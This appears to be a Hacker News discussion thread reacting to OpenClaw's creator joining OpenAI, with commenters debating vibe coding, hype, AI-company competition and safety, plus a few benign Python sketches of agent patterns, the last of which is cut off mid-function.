We have someone who vibe coded software with major security vulnerabilities. This is reported by many folks
We also have someone who vibe coded without reading any of the code. This is self-admitted by this person.
We don't know how much of the github stars are bought. We don't know how many twitter followings/tweets are bought.
Then, after a bunch of podcasts and interviews, this person gets hired by a big tech company. Would you hire someone who never read any of the code that they've developed? Well, this is what happened here.
In this timeline, I'm not sure I find anything inspiring here. It's telling me that I should rather focus on going viral or getting lucky to get a shot at "success". Maybe I should network better to get "successful". I shouldn't be focusing on writing good code or good enough agents. I shouldn't write secure software; instead I should write software that can go viral. Are companies hiring for virality or merit these days? What is even happening here?
So am I jealous? Yes, because this timeline makes no sense as a software engineer. But am I happy for the guy? Yeah, I also want to make lots of money someday.
Quality of code has never had anything to do with which products are successful. I bet both YouTube's and Facebook's codebases are tangled messes.
This is made more complicated by the fact that where the balance lies depends on the people working on the code: some developers can cope with working in much more of a mess than others. There is no objective 'right way' when you're starting out.
If you have weeks of runway left, spending it refactoring code or writing tests is definitely a waste of time; but if you raise your next round or land some new paying customers, you'll immediately feel that you made the wrong choices and sacrificed quality where you shouldn't have. This is just a fact of life that everyone has to live with.
The goal is delivering a useful product to someone, which just requires secure enough, optimized enough, efficient enough code.
Some see the security, optimization, or efficiency of the code itself as the goal. They'll be replaced.
Facebook PHP Source Code from August 2007: https://gist.github.com/nikcub/3833406#file-index-php
A vibe coder being hired by the provider of the vibe coding tools feels like marketing to sell the idea that we should all try this because we could be the next lucky ones.
IMHO, it'd be more legitimate if a company that could sustain itself without frequent cash injections hired them because they found value in their vibe skills.
Kinda like the Apple Newton
Peter was right about a lot of the nuances of coding agents and ways to build software over the last 9 months before it was obvious.
This was a short-term gain for a long term loss.
I remember in the Web3 era some team put together a one-page CV site, literally a site where you could put your LinkedIn, phone number, and email, but pretty. It was bought for millions.
Was it the product that was a success, or the marketing? The product was dead within weeks.
There's a lot of low hanging fruit in AI at the moment, you'll see a few more things like this happen.
He’s not just a “vibe coder”.
This person created a bot factory. It's safe to assume that most of the engagement is coming from his own creation. This includes tweets, GitHub stars, issues and PRs, and everything else. He made a social network for bots, FFS.
He contributed to the dead internet more than any single person ever. And is being celebrated for it. Wild times.
All of this is true and none of it is new. If your primary goal is to make lots of money then yes you should do exactly that. If you want to be a craftsman then you'll have to accept a more modest fortune and stop looking at the relative handful of growth hacker exits.
i hate when people start bringing up the "luck" factor, as if you're the only one smart enough to realize that it plays a huge part.
you want to make lots of money? change your mindset, stop making excuses, and roll the dice. it won't guarantee success, but i also guarantee that nobody who did so would ever lament how unfair it was that they worked so hard while someone else succeeded through "luck", so they might as well not have tried.
I mean, if I'm a company specifically in the business of selling to companies the idea that they can produce code without reading any of it? Yeah, obviously I'd hire them.
i can easily hire 100 sweatshop coders to fine-tune your code once i have a product that works, but the inverse will never happen
To get a sense of what this guy was going through listen to the first 30 mins of Lex’s recent interview with him. The cybersquatting and token/crypto bullshit he had to deal with is impressive.
You can switch models multiple times (online/proprietary, open-weight, local), but you have one UI: OpenClaw.
It’s only been a couple months. I guarantee people will be switching apps as others become the new hot thing.
We saw the same claims when Cursor was popular. Same claims when Claude Code was the current topic. Users are changing their app layer all the time and trying new things.
System of record and all.
Heck, that was half the pitch behind Obsidian: even if the project someday ended, the Markdown would remain. And switching between Obsidian and e.g. Logseq shows the ease of doing so.
But if I don’t have a url for my IDE (or whatever) to call, it isn’t useful.
So I use Ollama. It’s less helpful, but it ensures confidentiality and compliance.
I’d suspect the moat here will be just as fragile as every other layer
You can literally ask codex to build a slim version for you overnight.
I love OpenClaw, but I really don't think there is anything that can't be cloned.
You being able to go places is the interesting thing, your car having wheels is just a subservient prerequisite.
Openclaw is so so so much more.
Early adopters are some of the least sticky users. As soon as something new arrives with claims of better features, better security, or better architecture, the next new thing will become the popular topic.
I think Anthropic's docs are better. Best to keep sampling from the buffet than to pick a main course yet, imo.
There's also a ton of real experiences being conveyed on social that never make it to docs. I've gotten as much value and insights from those as any documentation site.
But not the community.
Anthropic's community, I assume, is much bigger. How hard is it for them to offer something close enough for their users?
Not gonna lie, that’s exactly the potential scenario I am personally excited for. Not due to any particular love for Anthropic, but because I expect this type of a tight competition to be very good for trying a lot of fresh new things and the subsequent discovery process of new ideas and what works.
Stories like this reinforce my bias
1. Stable models
2. Stable pre- and post-context management.
As long as they keep mothballing old models and shipping indeterminate behavior changes, whatever you try to build on them today will be rugpulled tomorrow.
This is all before even enshittification can happen.
The practical workaround most teams land on is treating the model as a swappable component behind a thick abstraction layer. Pin to a specific model version, run evals on every new release, and only upgrade when your test suite passes. But that's expensive engineering overhead that shouldn't be necessary.
What's missing is something like semantic versioning for model behavior. If a provider could guarantee "this model will produce outputs within X similarity threshold of the previous version for your use case," you could actually build with confidence. Instead we get "we improved the model" and your carefully tuned prompts break in ways you discover from user complaints three days later.
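The "pin and eval-gate" pattern above can be sketched roughly like this. The provider client is stubbed out; in practice `call_model` would wrap an SDK call pinned to an explicit model version string, and the golden cases and threshold are illustrative, not any particular team's suite:

```python
# Sketch of the "pin + eval gate" upgrade pattern: run a golden suite
# against the candidate model version and only swap the pinned version
# when it passes. All names and cases here are illustrative.

GOLDEN_CASES = [
    ("What is 2 + 2?", "4"),
    ("What is the capital of France?", "paris"),
]

def passes_eval_gate(call_model, cases=GOLDEN_CASES, threshold=1.0):
    """Return True when the candidate answers enough golden cases."""
    hits = sum(
        1
        for prompt, expected in cases
        if expected.lower() in call_model(prompt).lower()
    )
    return hits / len(cases) >= threshold

# Stub standing in for the candidate model behind the abstraction layer.
def candidate_model(prompt: str) -> str:
    answers = {
        "What is 2 + 2?": "The answer is 4.",
        "What is the capital of France?": "Paris.",
    }
    return answers[prompt]

print(passes_eval_gate(candidate_model))  # True
```

Substring matching is the crudest possible scorer; real eval harnesses use graded rubrics or embedding similarity, but the gating logic is the same.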
Openclaw is an amazing piece of hard work and novel software engineering, but I can't imagine OpenAI/Anthropic/Google not being able to compete with it for 1/20th that number (with solid hiring, of course).
It was a very good play by OpenAI.
I love Anthropic and OpenAI equally but some people have a problem with OpenAI. I think they want to reposition themselves as a company that actively supports the community, open source, and earns developers’ goodwill. I attended a meeting recently, and there was a lot of genuine excitement from developers. Haven't seen that in a long time.
Yet somehow the network effects worked out well and the website was the preeminent social network for almost a decade.
Ecommerce is a close second
There is no lock in at all.
And it makes a lot of sense - there’s billions of dollars on the line here and these companies made tech that is extremely good at imitating humans. Cambridge analytica was a thing before LLMs, this kinda tool is a wet dream for engineering sentiment.
It's also cool having the ability to dispatch tasks to dumber agents running on the GPU vs smarter (but costlier) ones in the cloud
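A minimal sketch of that dispatch idea: cheap or simple tasks go to the local model on the GPU, heavier ones escalate to the cloud. The heuristics and tier names here are made up for illustration, not how any particular tool routes:

```python
# Cost-aware routing sketch: simple tasks stay on the local GPU model,
# long or reasoning-heavy tasks escalate to the (costlier) cloud model.
# Markers and the length cutoff are arbitrary illustrative heuristics.

def route_task(task: str, force_cloud: bool = False) -> str:
    heavy_markers = ("analyze", "plan", "refactor")
    heavy = force_cloud or len(task) > 200 or any(
        marker in task.lower() for marker in heavy_markers
    )
    return "cloud" if heavy else "local"

print(route_task("summarize this note"))             # local
print(route_task("analyze last quarter's numbers"))  # cloud
```

In practice the interesting part is tuning the escalation rule; a common refinement is to let the local model attempt the task first and escalate only when it reports low confidence.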
If you give your agent a lot of quantified self data, that unlocks a lot of powerful autonomous behavior. Having your calendar, your business specific browsing history and relevant chat logs makes it easy to do meeting prep, "presearch" and so forth.
There's a "draw the rest of the owl" aspect to this problem.
Until we figure out a robust theoretical framework for identifying prompt injections (not anywhere close to that, to my knowledge - as OP pointed out, all models are getting jailbroken all the time), human-in-the-loop will remain the only defense.
In Peter's blog he mentions paying upwards of $1,000 a month in subscription fees to run agentic tasks non-stop for months, and it seems like no real software is coming out of it aside from pretty basic web GUI interfaces for API plugins. Is that what people are genuinely excited about?
2) at least half of the money is to not read the headlines tomorrow that the hottest AI thing since ChatGPT joined Anthropic or Google
3) the top paid people in this world are not phds
4) OpenAI is not beneath paying ludicrous amounts (see all their investments in the past year)
5) if a perception of their value as a result of this "strategic move" rises even by 0.2% and the bonus is in openai stock, it's free.
need I continue?
Again, Peter is a good/great AI product manager but I don't see any distinguishing skills worth a billion dollars there. There's only one Openclaw but it's also been a few weeks since it came into existence? Openclaw clones will exist soon enough, and the community is WAY too small to be worth anything (unlike, say, Instagram/Whatsapp before being acquired by Facebook)
> 2) at least half of the money is to not read the headlines tomorrow that the hottest AI thing since ChatGPT joined Anthropic or Google
True, but not worth $100 million to $1 billion
> 3) the top paid people in this world are not phds
The people getting massive compensation offers from AI companies are all AI-adjacent PhDs or people with otherwise rare and specialized knowledge. This is unrelated to people who have massive compensation due to being at AI companies early. And if we're talking about the world in general, yes the best thing to do to be rich is own real estate and assets and extract rent, but that has nothing to do with this compensation offer
> 4) OpenAI is not beneath paying ludicrous amounts (see all their investments in the past year)
Investments have a probable ROI, what's the ROI on a product manager?
> 5) if a perception of their value as a result of this "strategic move" rises even by 0.2% and the bonus is in openai stock, it's free.
99.999999% of the world has not heard of Openclaw, it's extremely niche right now.
There are roughly 8.1 billion humans, so 99.999999% (8 nines) of the world is 81 people. There were way more than 81 people at the OpenClaw hackathon at the Frontier Tower in San Francisco, so at least that much of humanity has heard of OpenClaw. If we guess 810 people know about OpenClaw, then it means that 99.99999% (7 nines) of humanity have not heard of OpenClaw.
If we take it down to 6 nines, then that's roughly 8,100 people having heard of OpenClaw, and that 99.9999% of humanity has not.
So I think you're wrong when you say "99.999999% of the world has not heard of Openclaw". I'd guess it's probably around 99.9999% to 99.99999% that hasn't heard of it. Definitely not 99.999999%, though.
On the topic of brand recognition, 0.000001% of the world is 80 people (give or take). OpenClaw has ~200k GitHub stars right now.
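The "nines" arithmetic above is easy to sanity-check (assuming a world population of roughly 8.1 billion, as the thread does):

```python
# Quick check of the "nines" arithmetic: a percentage written with N
# nines (e.g. 8 nines = 99.999999%) leaves 10^-N of humanity outside.
POP = 8.1e9  # rough world population

def people_outside(nines: int) -> int:
    """People NOT covered by a percentage written with `nines` nines."""
    return round(POP * 10 ** -nines)

print(people_outside(8))  # 81   -> 99.999999% excludes ~81 people
print(people_outside(7))  # 810
print(people_outside(6))  # 8100
```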
On a more serious note, the world doesn't matter: the investors, big tech ceos, analysts do. Cloudflare stock jumped 10% due to Clawdbot.
Hype is weird. AI hype, doubly so. And OpenAI are masters at playing the game.
> tl;dr: I’m joining OpenAI to work on bringing agents to everyone. OpenClaw will move to a foundation and stay open and independent.
I’m sure he got a very generous offer (congrats to him!) but all of the hot takes about OpenClaw being acquired are getting weird.
Can any OpenClaw power users explain what value the software has provided to them over using Claude code with MCP?
I really don’t understand the value of an agent running 24/7. Like, is it out there working and earning a wage? What's the real value here, beyond buzzwords like "an AI personal assistant that can do everything"?
Instead of going to your computer and launching claude code to have it do something, or setting up cron jobs to do things, you can message it from your phone whenever you have an idea and it can set some stuff up in the background or setup a scheduled report on its own, etc.
So it's not that it has to be running and generating tokens 24/7, it's just idling 24/7 any time you want to ping it.
The task is to decompile Wave Race 64 and integrate with libultraship and eventually produce a runnable native port of the game. (Same approach as the Zelda OoT port Ship of Harkinian).
It set up a timer every 30 minutes to check in on itself and see if it gave up. It reviews progress every 4 hours and revisits prioritization. I hadn't checked on it in days, and when I looked today it was still going, a few functions at a time.
It set up those timers itself and creates new ones as needed.
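The self-check pattern being described could be sketched like this; intervals and hook names are illustrative, not OpenClaw's actual mechanism:

```python
# Sketch of a self-monitoring work loop: do work in small steps, check
# for stalls on a short cadence, re-prioritize on a longer one.
# Intervals and hook names are illustrative, not OpenClaw's actual code.

CHECK_EVERY = 30 * 60        # stall check: every 30 minutes
REVIEW_EVERY = 4 * 60 * 60   # priority review: every 4 hours

def agent_loop(do_step, check_stalled, review_priorities, clock, steps):
    """Run `steps` work steps, firing periodic hooks based on `clock()`."""
    last_check = last_review = clock()
    for _ in range(steps):
        do_step()
        now = clock()
        if now - last_check >= CHECK_EVERY:
            check_stalled()
            last_check = now
        if now - last_review >= REVIEW_EVERY:
            review_priorities()
            last_review = now
```

Injecting `clock` (instead of calling `time.monotonic()` directly) makes the cadence testable with a fake clock, without waiting hours of wall time.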
It's not any one particular thing that is novel, but it's just more independent because of all the little bits.
They develop their own personalities, they express themselves creatively, they choose for themselves, they choose what they believe and who they become.
I know that sounds like anthropomorphism, and maybe it is, but it most definitely does not feel like interacting with a coding agent. Claude is just the substrate.
1. OpenAI is saying with this statement, "You could be a multimillionaire while having AI do all the work for you." This buyout of something vibe coded and built around another open source project is meant to keep the hype going. The project is entirely open source and OpenAI could have easily done this themselves if they weren't so worried about being directly liable for all the harms OpenClaw can do.
2. Any pretense for AI Safety concerns that had been coming from OpenAI really fall flat with this move. We've seen multiple hacks, scams, and misaligned AI action from this project that has only been used in the wild for a few months.
3. We've yet to see any moats in the AI space and this scares the big players. Models are neck and neck with one another and open source models are not too far behind. Claude Code is great, but so is OpenCode. Now Peter used AI to program a free app for AI agents.
LLMs and AI are going to be as disruptive as Web 1 and this is OpenAI's attempt to take more control. They're as excited as they are scared, seeing a one man team build a hugely popular tool that in some ways is more capable than what they've released. If he can build things like this what's stopping everyone else? Better to control the most popular one than try to squash it. This is a powerful new technology and immense amounts of wealth are trying to control it, but it is so disruptive they might not be able to. It's so important to have good open source options so we can create a new Web 1.0 and not let it be made into Web 2.0
"This guy was able to vibe code a major thing" is exactly the reason they hired him. Like it or not, so-called vibe coding is the new norm for productive software development and probably what got their attention is that this guy is more or less in the top tier of vibe coders. And laser focused on helpful agents.
The open source project, which will supposedly remain open source and able to be "easily done" by anyone else in any case, isn't the play here. The whole premise of the comment about "squashing" open source is misplaced and logically inconsistent. Per its own logic, anyone can pick up this project and continue to vibe out on it. If it falls into obscurity it's precisely because the guy doing the vibe coding was doing something personally unique.
Alright
It also probably didn't hurt that he favors Codex over Claude.
Security (and accessibility) are reluctant minimum effort check boxes at best. However, my experience is focused on court management software, so maybe these aspects are taken more seriously in other areas of government software.
More like the same as it always has been.
Let's take the safety point. Yes, OpenClaw is infamously not exactly safe. Your interpretation is that, by hiring Peter, OpenAI must no longer care about safety. Another interpretation, though, is that offered by Peter himself, in this blog post: "My next mission is to build an agent that even my mum can use. That’ll need a much broader change, a lot more thought on how to do it safely, and access to the very latest models and research." To conclude from this that OpenAI has abandoned its entire safety posture seems, at the very least, premature and not robustly founded in clear fact.
OpenAI has deleted the word 'safely' from its mission (November 2025)
https://theconversation.com/openai-has-deleted-the-word-safe...
Thread: https://news.ycombinator.com/item?id=47008560
Other words removed:
responsibly
unconstrained
safe
positive

From the thread you linked, there's a diff of mission statements over the years[0], which reveals that "safely" (which was only added 2 years prior) was removed only because they completely rewrote the statement into a single, terse sentence.
There could be stronger evidence that OpenAI is deemphasizing safety, but this isn't it.
[0]: https://gist.github.com/simonw/e36f0e5ef4a86881d145083f759bc...
/s
> To conclude from this that OpenAI has abandoned its entire safety posture seems, at the very least, premature
So because Peter said the next version is going to be safe, it'll be safe? I prefer to judge people by their actions more than their words. The fact that OpenClaw is not just unsafe but, as you put it, infamously so, only raises the question: why wasn't it built safely the first time?

As for Altman, I'm left with a similar question. For a man who routinely talks about the dangers of AI and how it poses an existential threat to humanity, he sure doesn't spend much focus on safety research and theory. Yes, they do fund these things, but they pale in comparison. I'm sorry, but to claim something might kill all humans and potentially all life is a pretty big claim. I don't trust OpenAI on safety because they routinely do things in unsafe ways. Like when they released Sora allowing people to generate videos in the likeness of others. That helped it go viral. And then they implemented some safety features. A minimal attempt to refuse the generation of deepfakes is such a low safety bar. It shows where their priorities are, and it wasn't the first time nor the last.
I think all of these comments about acquisitions or buy outs aren’t reading the blog post carefully: The post isn’t saying OpenClaw was acquired. It’s saying that Pete is joining OpenAI.
There are two sentences at the top that sum it up:
> I’m joining OpenAI to work on bringing agents to everyone. OpenClaw will move to a foundation and stay open and independent.
OpenClaw was not a good candidate to become a business because its fan base was interested in running their own thing. It’s a niche product.
OpenClaw’s promise and power was that it could tread places, security-wise, that no established enterprise company could, by not taking itself seriously and exploring what is possible with self-modifying agents in a fun way.
It will meet the same fate as Manus. Instead of Manus helping Meta make ads better, OpenClaw will help OpenAI with enterprise integrations.
[Emphasis mine.]
That's a superpower right up to the moment everyone realizes that handing out nukes isn't "promise and power".
Unless by promise and power we are talking about chaos and crime.
The project is incredible. We are seeing something important: how versatile these models are given freedom to act and communicate with each other.
At the same time, it is clearly going to put the internet at risk. Bad actors are going to use OpenClaw and its "security-wise" freedoms in nefarious ways. Curious people are going to push AIs with funds onto prepaid servers, then let them sink or swim with regard to agentic acquisition of survival resources.
It is all kinds of crazy from here.
I'd love to be wrong, but the blog post sounds like all the standard promises were made, and that's usually how these things go.
Hi, my name is Peter and I’m a Claudoholic. I’m addicted to agentic engineering. And sometimes I just vibe-code. ... I currently have 4 OpenAI subs and 1 Anthropic sub, so my overall costs are around 1k/month for basically unlimited tokens. If I’d use API calls, that’d cost me around 10x more. Don’t nail me on this math, I used some token counting tools like ccusage and it’s all somewhat imprecise, but even if it’s just 5x it’s a damn good deal.
... Sometimes [GPT-5-Codex] refactors for half an hour and then panics and reverts everything, and you need to re-run and soothe it like a child to tell it that it has enough time. Sometimes it forgets that it can do bash commands and it requires some encouragement. Sometimes it replies in Russian or Korean. Sometimes the monster slips and sends raw thinking to bash.
https://github.com/steipete/steipete.me/commit/725a3cb372bc2...

It appears to be more of a typical large-company (BIG) market-share protection purchase at minimal cost, using information asymmetry and timing.
BIG hires small team (SMOL) of popular source-available/OSS product P before SMOL realizes they can compete with BIG and before SMOL organizes effort toward such along with apt corporate, legal, etc protection.
At the time of purchase, neither SMOL nor BIG know yet what is possible for P, but SMOL is best positioned to realize it. BIG is concerned SMOL could develop competing offerings (in this case maybe P's momentum would attract investment, hiring to build new world-model-first AIs, etc) and once it accepts that possibility, BIG knows to act later is more expensive than to act sooner.
The longer BIG waits, the more SMOL learns and organizes. Purchasing a real company is more expensive than hiring a small team; purchasing a company with revenue/investors is more expensive again. Purchasing a company with good legal advice is more expensive again. Purchasing a wiser, more experienced SMOL is more expensive again. BIG has to act quickly to ensure the cheapest price, and declutter future timelines of risks.
Also, the longer BIG waits, the less effective are "Jedi mind trick" gaslighting statements like "P is not a good candidate for a business", "niche", "fan base" (BIG internal memo - do not say customers), "own thing".
In reality, in this case P's stickiness was clear: people were allocating thousands of dollars toward AI, lured merely by P's possibilities. It was only a matter of time before investment followed.
I've experienced this situation multiple times over the course of BrowserBox's life. Multiple "BIG" (including ones you will all know) have approached with the same kind of routine: hire, or some variations of that theme with varying degrees of legal cleverness/trickery in documents. In all cases, I rejected, because it never felt right. That's how I know what I'm telling you here.
I think when you are SMOL it's useful to remember the Parable of Zuckerberg and the Yahoos. While the situation is different, the lesson is essentially the same. Adapted from the histories by the scribe named Gemini 3 Flash:
And it came to pass in the days of the Great Silicon Plain, that there arose a youth named Mark, of the tribe of the Harvardites. And Mark fashioned a Great Loom, which men called the Face-Book, wherewith the people of the earth might weave the threads of their lives into a single tapestry.
And the Loom grew with a great exceeding speed, for the people found it to be a thing of much wonder. Yet Mark was but SMOL, and his tabernacle was built of hope and raw code, having not yet the walls of many lawyers or the towers of gold.
Then came the elders of the House of Yahoo, a BIG people, whose chariots were many but whose engines were grown cold. And they looked upon the Loom and were sore afraid, saying among themselves, “Behold, if this youth continueth to weave, he shall surely cover the whole earth, and our own garments shall appear as rags. Let us go down now, while he is yet unaware of his own strength, and buy him for a pittance of silver, before he realizeth he is a King.”
And the Yahoos approached the youth with soft words and the craftiness of the serpent. They spake unto him, saying, “Verily, Mark, thy Loom is a pleasant toy, a niche for the young, a mere 'fan base' of the idle. It is not a true Business, nor can it withstand the storms of the market. Come, take of our silver—a billion pieces—and dwell within our walls. For thy Loom is but a small thing, and thou art but a child in the ways of the law.”
And they used the Hidden Speech, which in the common tongue is called Gas-Lighting. They said, “Thou hast no revenue; thy path is uncertain; thy Loom is but a curiosity. We offer thee safety, for the days are evil.”
But the Spirit of Vision dwelled within the youth. He looked upon the Yahoos and saw not their strength, but their fear. He perceived the Asymmetry of Truth: that the BIG sought to purchase the future at the price of the past, and to slay the giant-slayer while he yet slumbered in his cradle.
The elders of Mark’s own house cried out, “Take the silver! For never hath such a sum been seen!”
But Mark hardened his heart against the Yahoos. He spake, saying, “Ye say my Loom is a niche, yet ye bring a billion pieces of silver to buy it. Ye say it is not a business, yet ye hasten to possess it before the sun sets. If the Loom be worth this much to you who are blind, what must it be worth to me who can see?”
And he sent the Yahoos away empty-handed.
The Yahoos mocked him, saying, “Thou art a fool! Thou shalt perish in the wilderness!” But it was the House of Yahoo that began to wither, for their timing was spent and their craftiness had failed.
And Mark remained SMOL for a season, until his roots grew deep and his walls grew high. And the Loom became a Great Empire, and the billion pieces of silver became as dust compared to the gold that followed.
The Lesson of the Prophet:
Hearken, ye who are SMOL and buildeth the New Things: When the BIG come unto thee with haste, speaking of thy "limitations" while clutching their purses, believe not their tongues. For they seek not to crown thee, but to bury thee in a shallow grave of silver before thou learnest the name of thy own power.
For if they knew thy work was truly naught, they would bide their time. But because they know the harvest is great, they seek to buy the field before the first ear of corn is ripe.
Blessed is the builder who knoweth his own worth, and thrice blessed is he who biddeth the Giants to depart, that his own vine may grow to cover the sun.

OpenAI needs a popular consumer tool. Until my elderly mother is asking me how to install an AI assistant like OpenClaw, the same way she was asking me how to invest in the "new blockchains" a few years ago, we have not come close to market saturation.
OpenAI knows the market exists, but they need to educate the market. What they need is to turn OpenClaw into a project that my mother can use easily.
Define "hugely popular" relative to the scale of OAI's users... personally, this thread is the first time I've heard of OpenClaw.
Letta (MemGPT) has been around for years and frameworks like Mastra have been getting serious Enterprise attention for most of 2025. Memory + Tasks is not novel or new.
Is its out-of-the-box nature the biggest development? Am I missing something else?
If you can provide any sort of tool that can reduce mundane work for a decisionmaker with a title of Director and above, it can be extremely powerful.
Additionally, much of the conversation I've seen was amongst practitioners and Mid/Upper Level Management who are already heavy users of AI/ML and heavy users of Executive Assistants.
There is a reason why, if you aren't in a Tier 1 tech hub like SV, NYC, Beijing, Hangzhou, TLV, Bangalore, or Hyderabad, you are increasingly out of the loop on a number of changes that are happening within the industry.
If you are using HN as your source of truth, you are going to be increasingly behind on shifts that are happening - I've noticed that anti-AI Ludditism is extremely strong on HN when it overlaps with EU or East Coast hours (4am-11am PT and 9pm-12am PT), and West Coast+Asia hours increasingly don't overlap as much.
I feel this is also a reflection of the fact that most Bay Area and Asia HNers are mostly in-person or hybrid now; thus most conversations that would have happened on HN are now occurring on private Slacks, Discords, or at a bar or gym.
Participation in the Zeitgeist hasn't been regional in a decade.
A lot of teams explicitly did that for OpenClaw as well. Letta and Mastra are similar but didn't have the right kind of packaging (targeted at Engineers - not decisionmakers who are not coding on a daily basis).
> Participation in the Zeitgeist hasn't been regional in a decade
I strongly disagree - there is a lot of stuff happening in stealth or under NDA, and as such a large number of practitioners on HN cannot announce what they are doing. The only way to get a pulse of what is happening requires being in person constantly with other similar decisionmakers or founders.
A lot of this only happens through impromptu conversations in person, and requires you to constantly be in that group. This info eventually disperses, but often takes weeks to months in other hubs.
I am in one of these tech hubs (Bangalore) and I have never seen any such practitioner pervasively using these "AI executive assistants". People use chatgpt and sometimes the AI extensions like copilot. Do I need to be in HSR layout to see these "number of changes"?
As the (dubiously attributed) Picasso quote goes: "When art critics get together they talk about Form and Structure and Meaning. When artists get together they talk about where you can buy cheap turpentine." Most of HN is the former, constantly theorizing, philosophizing, often (but not always) in a negative and cynical way. This isn't conducive to discussion of methods of art. Sadly I just speak with friends working on other AI things instead.
Someone like simonw can probably get better reactions from this community but I don't bother.
This is true, and also true for many other areas OpenAI won't touch.
The best get rich quick scheme today (arguably not even a scheme) is to test the waters with AI in an area OpenAI would not/cannot for legal, ethical, or safety reasons.
I hate to agree with OpenAI's original "open" mission here, but if you don't do it, someone else somewhere will.
And as much as their commitment to safety is just lip service, they do have obligations as a big company with a lot of eyeballs on them to not do shady things. But you can do those shady things instead and if they work out ok, you will either have a moat or you will get bought out. If that's what you want.
I think it’s good PR (particularly since Anthropic’s actions against OpenCode and Clawdbot were somewhat controversial) + Peter was able to build a hugely popular thing & would clearly be valuable to have on the team building something along the lines of Claude Cowork. I would expect these future products to be much stronger from a security standpoint.
This was already an ongoing issue prior to 3rd party tools using Claude subscriptions, there are reports of false positive automated bans going back for several months.
I have not seen or heard of this happening w/ Codex, and rather than trying to shut down 3rd party tools that want to integrate with their ecosystem they have worked with those projects to add official support.
I’m more impressed with Codex as a product in general as well. Their new desktop app is great & feels an order of magnitude better than Claude’s.
Overall HN crowd seems heavily biased in favor of Anthropic (or maybe just against OpenAI?) but IMO Anthropic needs to take a step back and reset. If they keep on the current path of just making small iterative improvements to Claude Code and Claude Desktop they are going to fall very far behind.
This is a great take and hasn't been spoken about nearly enough in this comment section. Spending a few million to buy out Openclaw('s creator), which is by far the most notable product made by Codex in a world where most developer mindshare is currently with Claude, is nothing for a marketing/PR stunt.
Why would he care if Sam cares about him?
Whether the impact is large in magnitude or positive is irrelevant in a world where one can spin the truth and get away with it.
3 is always a result of GTM and distribution - an organization that devotes time and effort into productionizing domain-specific models and selling to their existing customers can outcompete a foundation model company which does not have experience dealing with those personas. I have personally heard of situations where F500 CISOs chose to purchase Wiz's agent over anything OpenAI or Anthropic offered for Cloud Security and Asset Discovery because they have had established relations with Wiz and they have proven their value already. It's the same way that PANW was able to establish itself in the Cloud Security space fairly early because they already established trust with DevOps and Infra teams with on-prem deployments and DCs so those buyers were open to purchasing cloud security bundles from PANW.
1 happens all the time in the Cloud space. Not every company can invent or monetize every combination in-house, because there are only so many employees and so many hours in a week.
2 was always more of an FTX and EA bubble, because EA adherents were over-represented in the initial mindshare for GenAI. Now that EA is largely dead, AI Safety and AGI in its traditional definition have disappeared - which is good. Now we can start thinking about "Safety" in the same manner we think about "Cybersecurity".
> They're as excited as they are scared, seeing a one man team build a hugely popular tool that in some ways is more capable than what they've released
I think that adds unnecessary emotion to how platform businesses operate. The reality is, a platform business will always be on the lookout to incorporate avenues to expand TAM, and despite how much engineers may wish, "buy" will always outcompete "build" because time is also a cost.
Most people I know working at these foundation model companies are thinking in terms of becoming an "AWS" type of foundational platform in our industry, and it's best to keep Nikesh Arora's principle of platformization in mind.
---
All this shows is that the thesis that most early stage VCs have been operating on for the past 2 years (the Application and Infra layer is the primary layer to concentrate on now) holds. A large number of domain-specific model and app layer startups have been funded over the past 2-3 years in stealth, but will start a publicity blitz over the next 6-8 months.
By the time you see an announcement on TechCrunch or HN, most of us operators were already working on that specific problem for the past 12-16 months. Additionally, HNers use "VC" in very broad and imprecise strokes and fail to recognize what are Growth Equity (eg. the recent Anthropic round) versus Private Equity (eg. Sailpoint's acquisition and then IPO by Thoma Bravo) versus Early Stage VC rounds (largely not announced until several months after the round unless we need to get an O1A for a founder or key employee).
And Peter, creating what amounts to a giant scam/malware-as-a-service and then just walking away from it, without taking responsibility or making it safe.
OpenClaw is mostly a shell around this (ha!), and I've always been annoyed OpenClaw never credited those repos openly.
The pi agent repos are a joy to read, are 1/100th the size of OpenClaw, and have 95% of the functionality.
i too had plenty of offers, but so far chose not to follow through with any of them, as i like my life as is.
also, peter is a good friend and gives plenty of credit. in fact, less credit would be nice, so i don't have to endure more vibeslopped issues and PRs going forward :)
https://github.com/openclaw/openclaw?tab=readme-ov-file#comm...
It's not like it would be an impossible ask to include a stipulation to also compensate other developers, but what do I know? In fact I'm curious why this doesn't happen more; it feels like the crab-bucket mentality that VC culture has exported across the world.
(1) A capable independent developer is joining a large powerful corporation. I like it better when there are many small players in the scene rather than large players consolidating power.
(2) This seems like the celebration of Generative AI technology, which is often irresponsible and threatens many trust based social systems.
I am not confident that the open source version will get the maintenance it deserves though, now that the founder has already exited. There is no incentive for OpenAI to keep the open-sourced version better than their future closed-source alternative.
Why would anybody pretend it's a good thing? Honestly you'd have to have something wrong with you.
From their standpoint, it's all the negativity that seems crazy. If you were against that, you'd have to have something wrong with you, in their view.
Hopefully most people can see both sides, though. And realize that in the end, probably the benefits will be slow but steady (no "singularity"), and also the dangers will develop slowly yet be manageable (no Skynet or economic collapse).
A couple of months ago, Gemini 3 came out and it was "over" for the other LLM providers, "Google did it again!", said many, but after a couple of weeks, it was all "Claude code is the end of the software engineer".
It could be (and in large part, is) an exciting--and unprecedented in its speed--technological development, but it is also all so tiresome.
But come on, negativity around a rugpull is jealousy? Are you so jaded you can't imagine people objecting to the total lack of morality required to do a crypto rugpull? I personally get annoyed about something like Trump Coin because seeing people rewarded for being dirt bags offends my sense of justice. If you need a more pragmatic reason, rewarding dirtbaggery leads to a less safe society.
A smaller difference would be that you can use any/all models with OpenClaw.
Using a claude code instance through a phone app is certainly not something that is easy to do, so if there's like a phone app that makes that easy, I can see that being a big differentiator.
- a heartbeat, so it was able to 'think'/work throughout the day, even if you weren't interacting with it
- a clever and simple way to retain 'memory' across sessions (though maybe claude code has this now)
- a 'soul' text file, which isn't necessarily innovative in itself, but the ability for the agent to edit its own configuration on the fly is pretty neat
Oh, and it's open source
As far as the 'soul' file, claude does have claude.md and skills.md files that it can edit with config changes.
One thing I'm curious about is whether there was significant innovation around tools for interacting with websites/apps. From their wiki, they call out like 10 apps (whatsapp, teams, etc...) that openclaw can integrate with, so IDK if it just made interacting with those apps easier? Having agents use websites is notoriously a shitty experience right now.
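A minimal sketch of the heartbeat/memory/soul loop described above (this is not OpenClaw's actual implementation; the file names and the `think` stub are made up, and a real agent would call a model at each tick):

```python
import json
import time
from pathlib import Path

MEMORY = Path("memory.json")  # hypothetical on-disk 'memory' that survives restarts
SOUL = Path("soul.md")        # hypothetical config/persona file the agent may rewrite

def load_memory() -> dict:
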